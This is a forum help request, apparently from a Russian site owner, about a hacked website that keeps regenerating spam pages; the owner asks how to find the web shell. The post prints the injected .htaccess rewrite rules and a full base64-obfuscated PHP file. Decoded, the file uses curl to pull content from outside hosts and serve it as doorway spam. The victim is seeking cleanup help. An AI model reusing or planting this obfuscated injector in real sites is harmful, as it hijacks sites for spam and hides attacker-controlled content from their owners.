Взлом сайта. Как найти шел?

Добрый день, столкнулся с проблемой, взломали сайт, на нем разместили какую-то информации по скачке книг, страниц очень много, гугл проиндексировал. Нашел заразу, в htaccess идет обращение:

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_HOST} !^$ [NC]

RewriteCond %{HTTP_HOST} !^www\. [NC]

RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]

RewriteRule ^books(.*) /system/system.php?id=$1

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteCond %{REQUEST_URI} !/books

RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA]

Открыл файл system.php в нем:

<? $GLOBALS['_483328755_']=Array(base64_decode('Y3Vy' .'bF9pbml0'),base64_decode('Y3' .'VybF9zZX' .'RvcHQ='),base64_decode('Y3V' .'ybF9zZXRv' .'cHQ='),base64_decode('Y3VybF9leG' .'V' .'j'),base64_decode('Y' .'3VybF9' .'jbG9zZ' .'Q=' .'='),base64_decode('c3R' .'yc3Ry'),base64_decode('aGV' .'hZGVy'),base64_decode('c3Ryc3Ry'),base64_decode('' .'aGVhZG' .'V' .'y'),base64_decode('' .'c3R' .'yc3' .'Ry'),base64_decode('c' .'3' .'Ryc3Ry'),base64_decode('aGVhZGVy'),base64_decode('c3Ryc' .'3R' .'y'),base64_decode('' .'aG' .'Vh' .'ZGVy'),base64_decode('' .'aGVh' .'ZGV' .'y'),base64_decode('Y3VybF9' .'pb' .'ml0'),base64_decode('Y3Vy' .'bF9zZX' .'RvcHQ' .'='),base64_decode('Y3VybF9zZX' .'RvcHQ' .'='),base64_decode('Y3Vyb' .'F9leGVj'),base64_decode('Y' .'3VybF9jbG9' .'zZQ' .'=='),base64_decode('c3' .'Ry' .'c3Ry'),base64_decode('aGVh' .'ZGV' .'y'),base64_decode('' .'c3Ryc3Ry'),base64_decode('' .'a' .'GV' .'h' .'ZGVy'),base64_decode('c' .'3R' .'yc' .'3R' .'y'),base64_decode('c3' .'Ryc3Ry'),base64_decode('a' .'GVh' .'ZGVy'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('aGVhZGVy'),base64_decode('' .'a' .'GVhZGV' .'y')); ?><? function _1894674912($i){$a=Array('aWQ=','aHR0cDovL2VtYWlsZXJycnIucnUv','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx','aWQ=','aHR0cDovL2FsZW5zZXQuaW4vZXJhbS9wcmVtaWVyZGV0ZWN0LnJ1Lw==','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx');return base64_decode($a[$i]);} ?><? function l__0(){$_0=$_REQUEST[_1894674912(0)];$_1=$GLOBALS['_483328755_'][0]();$_2=_1894674912(1) .$_0;$GLOBALS['_483328755_'][1]($_1,CURLOPT_URL,$_2);$GLOBALS['_483328755_'][2]($_1,CURLOPT_RETURNTRANSFER,round(0+0.333333333333+0.333333333333+0.333333333333));$_3=$GLOBALS['_483328755_'][3]($_1);$GLOBALS['_483328755_'][4]($_1);if($GLOBALS['_483328755_'][5]($_0,_1894674912(2))){$GLOBALS['_483328755_'][6](_1894674912(3));}elseif($GLOBALS['_483328755_'][7]($_0,_1894674912(4))){$GLOBALS['_483328755_'][8](_1894674912(5));}elseif($GLOBALS['_483328755_'][9]($_0,_1894674912(6))|| $GLOBALS['_483328755_'][10]($_0,_1894674912(7))){$GLOBALS['_483328755_'][11](_1894674912(8));}elseif($GLOBALS['_483328755_'][12]($_0,_1894674912(9))){$GLOBALS['_483328755_'][13](_1894674912(10));}else{$GLOBALS['_483328755_'][14](_1894674912(11));}echo $_3;}$_0=$_REQUEST[_1894674912(12)];$_1=$GLOBALS['_483328755_'][15]();$_2=_1894674912(13) .$_0;$GLOBALS['_483328755_'][16]($_1,CURLOPT_URL,$_2);$GLOBALS['_483328755_'][17]($_1,CURLOPT_RETURNTRANSFER,round(0+0.5+0.5));$_3=$GLOBALS['_483328755_'][18]($_1);$GLOBALS['_483328755_'][19]($_1);if($GLOBALS['_483328755_'][20]($_0,_1894674912(14))){$GLOBALS['_483328755_'][21](_1894674912(15));}elseif($GLOBALS['_483328755_'][22]($_0,_1894674912(16))){$GLOBALS['_483328755_'][23](_1894674912(17));}elseif($GLOBALS['_483328755_'][24]($_0,_1894674912(18))|| $GLOBALS['_483328755_'][25]($_0,_1894674912(19))){$GLOBALS['_483328755_'][26](_1894674912(20));}elseif($GLOBALS['_483328755_'][27]($_0,_1894674912(21))){$GLOBALS['_483328755_'][28](_1894674912(22));}else{$GLOBALS['_483328755_'][29](_1894674912(23));}echo $_3; ?>

Машину проверил на вирусы - нет

Сменил пароль от FTP

Если сносить эти файлы они появляются вновь в течении 1-2 минут. Как быть?